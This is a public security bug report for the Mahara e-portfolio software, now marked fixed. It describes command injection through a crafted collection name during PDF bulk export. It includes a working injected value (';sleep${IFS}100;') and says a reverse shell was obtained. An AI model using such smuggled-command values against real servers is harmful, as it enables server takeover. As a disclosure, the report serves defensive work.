Command injection vulnerability when PDF bulk export is enabled
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Mahara |
Fix Released
|
High
|
Unassigned | ||
20.04 |
Fix Released
|
High
|
Unassigned | ||
20.10 |
Fix Released
|
High
|
Unassigned | ||
21.04 |
Fix Released
|
High
|
Unassigned |
Bug Description
Hi team, I hope you're doing well! When the experimental PDF export feature is enabled, a user can craft a malicious collection in Mahara and trigger the command injection issue when an admin exports the attacker's data (either specifically or by exporting the institution the attacker belongs to).
This was tested yesterday (2021-09-06) using the docker-compose file in the master branch of https:/
## Steps To Reproduce:
URLs will be using `http://
### Setup
1. Login as administrator
2. Go to the Plugin Administration page `http://
### Exploitation
1. As the attacker (normal user account), create a collection named `;sleep${IFS}100;`
2. As the administrator go to the bulk export page `http://
3. Choose `PDF files of pages and collections` as the export format
4. Set the attacker's username in `Usernames to export`
5. Click `Export Accounts` and observe the 100 seconds delay in processing
See the following section for a reverse shell example
## Details
The issue comes from https:/
```php
if ($combiner == 'pdfunite') {
}
```
`$collectionname` is user controlled and the sanitization allows just enough characters to be able to inject commands
https:/
```php
public static function text_to_
// truncates the text and replaces NOT allowed characters to hyphens
return preg_replace(
}
```
In the attached video the malicious collection name is
```bash
;cd$IFS`
```
and it triggered a reverse shell, see attached video. Note that I had to install curl on my server to make it work, but that's likely to be present on a real system.
Suggested CVSS: AV:N/AC:
`AC:H` because of the setting that's likely to be disabled, `PR:L` because the payload is injected as a regular user, `UI:R` as it's triggered by an admin export, `S:C` as it impact everything on the server once a reverse shell is obtained.
Let me know if you need anything else!
Dominic
CVE References
description: | updated |
Changed in mahara: | |
status: | New → Confirmed |
importance: | Undecided → High |
milestone: | none → 21.10.0 |
no longer affects: | mahara/21.10 |
information type: | Private Security → Public Security |
I'm used to writing everything in Markdown, just for clarity in the step 1 of exploitation the backticks aren't part of the payload. The collection name is just ;sleep${IFS}100;